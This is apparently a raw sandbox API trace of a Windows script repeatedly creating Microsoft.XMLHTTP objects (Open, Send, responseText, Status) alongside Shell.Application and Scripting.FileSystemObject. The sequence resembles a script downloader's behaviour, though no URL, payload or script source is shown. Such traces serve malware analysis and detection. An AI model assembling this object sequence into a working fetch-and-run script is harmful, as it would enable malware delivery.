	[0321.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0321.185] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0321.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0321.185] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0321.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0321.185] longjmp () 
	[0321.185] longjmp () 
	[0321.185] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0321.185] SysStringLen (param_1=0x0) returned 0x0
	[0321.185] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0321.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0321.185] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0321.185] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0321.185] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7568) returned 0x0
	[0321.185] ??2@YAPEAX_K@Z () returned 0x62f330
	[0321.186] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7568, pUnkSite=0x62f330) 
	[0321.186] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0321.186] XMLHTTPRequest:IUnknown:Release (This=0x49c7568) returned 0x0
	[0321.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0321.186] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0321.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0321.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0321.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0321.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0321.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0321.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0321.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0321.661] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0321.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0321.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0321.661] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0321.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0321.661] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0321.661] SysStringLen (param_1=0x0) returned 0x0
	[0321.661] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0321.662] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0321.662] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0321.662] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0321.662] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0321.662] ??2@YAPEAX_K@Z () returned 0x62f350
	[0321.662] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0321.662] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0321.662] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0321.662] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0321.662] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0321.662] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0321.662] SysStringLen (param_1=0x0) returned 0x0
	[0321.662] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0321.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0321.664] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0321.664] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0321.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0321.664] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0321.664] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0322.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0322.182] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0322.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0322.183] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0322.183] SysStringLen (param_1=0x0) returned 0x0
	[0322.183] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0322.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0322.184] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0322.184] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0322.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0322.184] ??2@YAPEAX_K@Z () returned 0x62f330
	[0322.184] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0322.184] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0322.184] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0322.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0322.184] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0322.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0322.184] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0322.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0322.187] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0322.187] SysStringLen (param_1=0x0) returned 0x0
	[0322.187] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0322.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0322.187] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0322.188] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0322.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0322.188] ??2@YAPEAX_K@Z () returned 0x62f310
	[0322.188] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f310) 
	[0322.188] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0322.188] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0322.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0322.188] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0322.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0322.188] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0322.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0322.188] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0322.189] SysStringLen (param_1=0x0) returned 0x0
	[0322.189] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0322.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0322.189] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0322.189] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0322.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7278) returned 0x0
	[0322.189] ??2@YAPEAX_K@Z () returned 0x62f330
	[0322.189] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7278, pUnkSite=0x62f330) 
	[0322.189] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0322.189] XMLHTTPRequest:IUnknown:Release (This=0x49c7278) returned 0x0
